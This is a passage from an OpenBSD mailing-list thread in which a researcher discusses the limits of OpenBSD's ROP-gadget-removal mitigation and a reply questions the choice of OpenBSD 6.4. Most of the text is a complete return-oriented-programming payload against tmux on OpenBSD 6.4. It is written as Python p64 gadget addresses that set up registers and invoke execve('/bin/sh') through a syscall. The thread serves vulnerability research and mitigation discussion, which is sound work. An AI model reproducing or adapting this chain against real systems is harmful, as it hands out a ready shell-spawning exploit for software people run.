Because, as far as I understand, these ROP mitigation mechanisms seem to
have been updated only in the three versions of OpenBSD, namely 6.3 to 6.5
<https://www.openbsd.org/65.html>. Of course, I have also studied some
programs under OpenBSD 6.5, and many of them still seem to have the
potential to be bypassed.
<f...@disciples.com> 于2023年9月22日周五 12:02写道:
> Why are you targeting 6.4? That was released in 2018. So, that's 5 years
> and 9 releases since then and another one is happening soon.
>
>
>
>
> Sent: Thursday, September 21, 2023 at 8:50 AM
> From: "Nan ZoE" <zoen...@gmail.com>
> To: misc@openbsd.org
> Subject: ROP Exploitation in openbsd-64 Programs After Removing ROP Gadgets
> Hello,
>
>
>
> I have read your paper regarding the ROP mitigation mechanism (Removing ROP
> Gadgets from OpenBSD), and I find the defense against ROP quite ingenious.
> The paper introduces the bytecode for 'ret' as '\xc3,' and its association
> with the use of the 'rbx' register was a surprising revelation.
> Subsequently, you adjusted the prioritization of the 'rbx' register during
> compilation, effectively filtering out a significant number of 'ret'-ending
> gadgets. This especially removed many misaligned 'ret'-ending gadgets, and
> this technique has been applied to openbsd-63, 64, and 65. While the number
> of 'ret'-ending gadgets has been significantly reduced, there are still
> numerous 'call'-ending gadgets in the program. Security researchers can
> still employ many 'call'-ending gadgets to carry out ROP attacks. Even in
> programs of only a few hundred kilobytes, I have found that we can still
> invoke the execve("/bin/sh", 0, 0) function using only the available
> gadgets in the program, albeit it may require a combination of multiple
> gadgets and some effort to achieve. I am curious if there are any further
> ROP mitigation measures to address this issue? Additionally, I have
> provided an ROP attack example targeting the tmux program in OpenBSD-64, as
> shown below.
>
>
>
> payload = p64(0x4017ce)
>
> #0x00000000004017ce: pop r13; pop r14; pop r15; ret;
>
> payload += p64(0x68732f6e69622f)+p64(0x0)+p64(0x0)+p64(0x40125d)
>
> # 0x000000000040125d: pop rbp; ret;
>
> payload += p64(0x4017d1)+p64(0x403dd3)
>
> # 0x0000000000403dd3: xchg eax, ebp; ret;
>
> payload += p64(0x412208)
>
> # 0x0000000000412208: mov rcx, r13; call rax;
>
> payload += b''
>
> # 0x00000000004017d1: pop rsi; pop r15; ret;
>
> payload += p64(0x0)+p64(0x40125d)
>
> # 0x000000000040125d: pop rbp; ret;
>
> payload += p64(0x40125d)+p64(0x403dd3)
>
> # 0x0000000000403dd3: xchg eax, ebp; ret;
>
> payload += p64(0x427a31)
>
> # 0x0000000000427a31: pop rbx; pop rbp; jmp rax;
>
> payload += p64(0x49e0ed)+p64(0x0)
>
> # 0x000000000040125d: pop rbp; ret;
>
> payload += p64(0x4017d1)+p64(0x403dd3)
>
> # 0x0000000000403dd3: xchg eax, ebp; ret;
>
> payload += p64(0x412053)
>
> # 0x0000000000412053: mov r8, rbx; call rax;
>
> payload += b''
>
> # 0x00000000004017d1: pop rsi; pop r15; ret;
>
> payload += p64(0x0)+p64(0x4551d9)
>
> # 0x00000000004551d9: add qword ptr [r8 - 0x7d], rcx; ret;
>
> payload += p64(0x4017d3)
>
> # 0x00000000004017d3: pop rdi; ret;
>
> payload += p64(0x49e070)+p64(0x40d571)
>
> # 0x000000000040d571: pop rsi; ret;
>
> payload += p64(0x0)+p64(0x4017cf)
>
> # 0x00000000004017cf: pop rbp; pop r14; pop r15; ret;
>
> payload += p64(0x0)+p64(0x4017d0)+p64(0x0)+p64(0x40125d)
>
> # 0x000000000040125d: pop rbp; ret;
>
> payload += p64(0x49e1d0)+p64(0x42d80b)
>
> # 0x000000000042d80b: mov rdx, r15; mov rcx, qword ptr [rbp - 0x40]; mov
> rax, r14; call rax;
>
> payload += b''
>
> # 0x00000000004017d0: pop r14; pop r15; ret;
>
> payload += p64(0x0)+p64(0x40125d)
>
> # 0x000000000040125d: pop rbp; ret;
>
> payload += p64(0x3b)+p64(0x403dd3)
>
> # 0x0000000000403dd3: xchg eax, ebp; ret;
>
> payload += p64(0x407fae)
>
> # 0x0000000000407fae: syscall;
>
> payload += b''
>
>
>
> Best regards,
>
> ZoE
>
> 2023.09.21
>
